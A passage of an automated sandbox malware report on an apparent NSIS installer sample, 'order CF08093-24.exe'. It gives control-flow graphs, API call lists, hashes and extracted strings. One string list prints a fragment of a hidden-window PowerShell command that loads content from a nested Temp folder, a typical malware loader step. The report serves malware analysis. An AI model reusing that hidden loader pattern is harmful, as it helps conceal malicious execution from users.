                                                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040311B
                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\order CF08093-24.exe", xrefs: 004030A8
                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
                                                                            • Error launching installer, xrefs: 004030F2
                                                                            • soft, xrefs: 00403190
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004030A9
                                                                            • Null, xrefs: 00403199
                                                                            • C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108
                                                                            • Inst, xrefs: 00403187
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                            • String ID: "C:\Users\user\Desktop\order CF08093-24.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                            • API String ID: 2803837635-19654962
                                                                            • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                            • Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
                                                                            • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                            • Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D

                                                                            Control-flow Graph

                                                                            control_flow_graph 450 40657e-406587 451 406589-406598 450->451 452 40659a-4065b4 450->452 451->452 453 4067c4-4067ca 452->453 454 4065ba-4065c6 452->454 456 4067d0-4067dd 453->456 457 4065d8-4065e5 453->457 454->453 455 4065cc-4065d3 454->455 455->453 459 4067e9-4067ec 456->459 460 4067df-4067e4 call 406541 456->460 457->456 458 4065eb-4065f4 457->458 461 4067b1 458->461 462 4065fa-40663d 458->462 460->459 464 4067b3-4067bd 461->464 465 4067bf-4067c2 461->465 466 406643-40664f 462->466 467 406755-406759 462->467 464->453 465->453 468 406651 466->468 469 406659-40665b 466->469 470 40675b-406762 467->470 471 40678d-406791 467->471 468->469 474 406695-406698 469->474 475 40665d-406683 call 40640f 469->475 472 406772-40677e call 406541 470->472 473 406764-406770 call 406488 470->473 476 4067a1-4067af lstrlenW 471->476 477 406793-40679c call 40657e 471->477 488 406783-406789 472->488 473->488 481 40669a-4066a6 GetSystemDirectoryW 474->481 482 4066ab-4066ae 474->482 491 406689-406690 call 40657e 475->491 492 40673d-406740 475->492 476->453 477->476 489 406738-40673b 481->489 484 4066c0-4066c4 482->484 485 4066b0-4066bc GetWindowsDirectoryW 482->485 484->489 490 4066c6-4066e4 484->490 485->484 488->476 493 40678b 488->493 489->492 494 40674d-406753 call 4067ef 489->494 497 4066e6-4066ec 490->497 498 4066f8-406710 call 406935 490->498 491->489 492->494 495 406742-406748 lstrcatW 492->495 493->494 494->476 495->494 503 4066f4-4066f6 497->503 507 406712-406725 SHGetPathFromIDListW CoTaskMemFree 498->507 508 406727-406730 498->508 503->498 505 406732-406736 503->505 505->489 507->505 507->508 508->490 508->505
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066A0
                                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004066B6
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406714
                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
                                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 00406748
                                                                            • lstrlenW.KERNEL32(: Completed,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004067A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                            • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$daniglacial$powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprm
                                                                            • API String ID: 4024019347-2235894875
                                                                            • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                            • Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
                                                                            • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                            • Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E

                                                                            Control-flow Graph

                                                                            control_flow_graph 509 401794-4017b9 call 402dcb call 405e87 514 4017c3-4017d5 call 406541 call 405e10 lstrcatW 509->514 515 4017bb-4017c1 call 406541 509->515 520 4017da-4017db call 4067ef 514->520 515->520 524 4017e0-4017e4 520->524 525 4017e6-4017f0 call 40689e 524->525 526 401817-40181a 524->526 533 401802-401814 525->533 534 4017f2-401800 CompareFileTime 525->534 528 401822-40183e call 406031 526->528 529 40181c-40181d call 40600c 526->529 536 401840-401843 528->536 537 4018b2-4018db call 4055c6 call 4032d9 528->537 529->528 533->526 534->533 538 401894-40189e call 4055c6 536->538 539 401845-401883 call 406541 * 2 call 40657e call 406541 call 405ba1 536->539 549 4018e3-4018ef SetFileTime 537->549 550 4018dd-4018e1 537->550 551 4018a7-4018ad 538->551 539->524 571 401889-40188a 539->571 554 4018f5-401900 CloseHandle 549->554 550->549 550->554 555 402c58 551->555 557 401906-401909 554->557 558 402c4f-402c52 554->558 559 402c5a-402c5e 555->559 561 40190b-40191c call 40657e lstrcatW 557->561 562 40191e-401921 call 40657e 557->562 558->555 568 401926-4023c7 call 405ba1 561->568 562->568 568->559 575 402953-40295a 568->575 571->551 573 40188c-40188d 571->573 573->538 575->558
                                                                            APIs
                                                                            • lstrcatW.KERNEL32(00000000,00000000,32079,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes,?,?,00000031), ref: 004017D5
                                                                            • CompareFileTime.KERNEL32(-00000014,?,32079,32079,00000000,00000000,32079,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes,?,?,00000031), ref: 004017FA
                                                                              • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                              • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                                              • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: 32079$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes$hadefuldeste\optjeningers\hottish
                                                                            • API String ID: 1941528284-1322005942
                                                                            • Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                            • Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
                                                                            • Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                            • Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D

                                                                            Control-flow Graph

                                                                            control_flow_graph 576 4055c6-4055db 577 4055e1-4055f2 576->577 578 405692-405696 576->578 579 4055f4-4055f8 call 40657e 577->579 580 4055fd-405609 lstrlenW 577->580 579->580 582 405626-40562a 580->582 583 40560b-40561b lstrlenW 580->583 585 405639-40563d 582->585 586 40562c-405633 SetWindowTextW 582->586 583->578 584 40561d-405621 lstrcatW 583->584 584->582 587 405683-405685 585->587 588 40563f-405681 SendMessageW * 3 585->588 586->585 587->578 589 405687-40568a 587->589 588->587 589->578
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                            • lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                            • lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                                            • SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                            • String ID: daniglacial
                                                                            • API String ID: 2531174081-766043870
                                                                            • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                            • Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
                                                                            • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                            • Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58

                                                                            Control-flow Graph

                                                                            control_flow_graph 590 4032d9-4032f0 591 4032f2 590->591 592 4032f9-403301 590->592 591->592 593 403303 592->593 594 403308-40330d 592->594 593->594 595 40331d-40332a call 4034be 594->595 596 40330f-403318 call 4034d4 594->596 600 403330-403334 595->600 601 403475 595->601 596->595 603 40333a-40335a GetTickCount call 406a90 600->603 604 40345e-403460 600->604 602 403477-403478 601->602 605 4034b7-4034bb 602->605 616 4034b4 603->616 618 403360-403368 603->618 606 403462-403465 604->606 607 4034a9-4034ad 604->607 609 403467 606->609 610 40346a-403473 call 4034be 606->610 611 40347a-403480 607->611 612 4034af 607->612 609->610 610->601 623 4034b1 610->623 614 403482 611->614 615 403485-403493 call 4034be 611->615 612->616 614->615 615->601 627 403495-4034a1 call 4060e3 615->627 616->605 621 40336a 618->621 622 40336d-40337b call 4034be 618->622 621->622 622->601 628 403381-40338a 622->628 623->616 633 4034a3-4034a6 627->633 634 40345a-40345c 627->634 630 403390-4033ad call 406ab0 628->630 636 4033b3-4033ca GetTickCount 630->636 637 403456-403458 630->637 633->607 634->602 638 403415-403417 636->638 639 4033cc-4033d4 636->639 637->602 642 403419-40341d 638->642 643 40344a-40344e 638->643 640 4033d6-4033da 639->640 641 4033dc-40340d MulDiv wsprintfW call 4055c6 639->641 640->638 640->641 650 403412 641->650 646 403432-403438 642->646 647 40341f-403424 call 4060e3 642->647 643->618 644 403454 643->644 644->616 649 40343e-403442 646->649 651 403429-40342b 647->651 649->630 652 403448 649->652 650->638 651->634 653 40342d-403430 651->653 652->616 653->649
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CountTick$wsprintf
                                                                            • String ID: ... %d%%
                                                                            • API String ID: 551687249-2449383134
                                                                            • Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                            • Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
                                                                            • Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                            • Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9

                                                                            Control-flow Graph

                                                                            control_flow_graph 654 4068c5-4068e5 GetSystemDirectoryW 655 4068e7 654->655 656 4068e9-4068eb 654->656 655->656 657 4068fc-4068fe 656->657 658 4068ed-4068f6 656->658 660 4068ff-406932 wsprintfW LoadLibraryExW 657->660 658->657 659 4068f8-4068fa 658->659 659->660
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                            • wsprintfW.USER32 ref: 00406917
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%S.dll$UXTHEME
                                                                            • API String ID: 2200240437-1106614640
                                                                            • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                            • Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
                                                                            • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                            • Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798

Control-flow Graph
control_flow_graph 661 406060-40606c 662 40606d-4060a1 GetTickCount GetTempFileNameW 661->662 663 4060b0-4060b2 662->663 664 4060a3-4060a5 662->664 666 4060aa-4060ad 663->666 664->662 665 4060a7 664->665 665->666
APIs
• GetTickCount.KERNEL32 ref: 0040607E
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040351A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806), ref: 00406099
Strings
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-44229769
• Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
• Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
• Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
• Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768

Control-flow Graph
control_flow_graph 750 4015e6-4015fa call 402dcb call 405ebb 755 401656-401659 750->755 756 4015fc-40160f call 405e3d 750->756 758 401688-40231b call 401423 755->758 759 40165b-40167a call 401423 call 406541 SetCurrentDirectoryW 755->759 763 401611-401614 756->763 764 401629-40162c call 405aef 756->764 772 402c4f-402c5e 758->772 759->772 779 401680-401683 759->779 763->764 768 401616-40161d call 405b0c 763->768 771 401631-401633 764->771 768->764 783 40161f-401627 call 405a95 768->783 775 401635-40163a 771->775 776 40164c-401654 771->776 780 401649 775->780 781 40163c-401647 GetFileAttributesW 775->781 776->755 776->756 779->772 780->776 781->776 781->780 783->771
APIs
  • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405EC9
  • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
  • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
  • Part of subcall function 00405A95: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AD7
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes,?,00000000,000000F0), ref: 00401672
Strings
• C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes, xrefs: 00401665
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes
• API String ID: 1892508949-2464104712
• Opcode ID: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
• Instruction ID: 707209c2395922376f9f001c82b8f9212c950a3f0646f554414056ec45e3a30b
• Opcode Fuzzy Hash: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
• Instruction Fuzzy Hash: DC11B231504514EBDF206FA5CD415AF36B0EF14368B25493FE942B22F1D63E4A81DA9D

Control-flow Graph
control_flow_graph 790 407094-40709a 791 40709c-40709e 790->791 792 40709f-4070bd 790->792 791->792 793 407390-40739d 792->793 794 4072cb-4072e0 792->794 795 4073c7-4073cb 793->795 796 4072e2-4072f8 794->796 797 4072fa-407310 794->797 799 40742b-40743e 795->799 800 4073cd-4073ee 795->800 798 407313-40731a 796->798 797->798 803 407341 798->803 804 40731c-407320 798->804 805 407347-40734d 799->805 801 4073f0-407405 800->801 802 407407-40741a 800->802 806 40741d-407424 801->806 802->806 803->805 807 407326-40733e 804->807 808 4074cf-4074d9 804->808 810 406af2 805->810 811 4074fa 805->811 813 4073c4 806->813 814 407426 806->814 807->803 812 4074e5-4074f8 808->812 816 406af9-406afd 810->816 817 406c39-406c5a 810->817 818 406b9e-406ba2 810->818 819 406c0e-406c12 810->819 815 4074fd-407501 811->815 812->815 813->795 823 4073a9-4073c1 814->823 824 4074db 814->824 816->812 825 406b03-406b10 816->825 817->794 821 406ba8-406bc1 818->821 822 40744e-407458 818->822 826 406c18-406c2c 819->826 827 40745d-407467 819->827 828 406bc4-406bc8 821->828 822->812 823->813 824->812 825->811 829 406b16-406b5c 825->829 830 406c2f-406c37 826->830 827->812 828->818 831 406bca-406bd0 828->831 832 406b84-406b86 829->832 833 406b5e-406b62 829->833 830->817 830->819 834 406bd2-406bd9 831->834 835 406bfa-406c0c 831->835 838 406b94-406b9c 832->838 839 406b88-406b92 832->839 836 406b64-406b67 GlobalFree 833->836 837 406b6d-406b7b 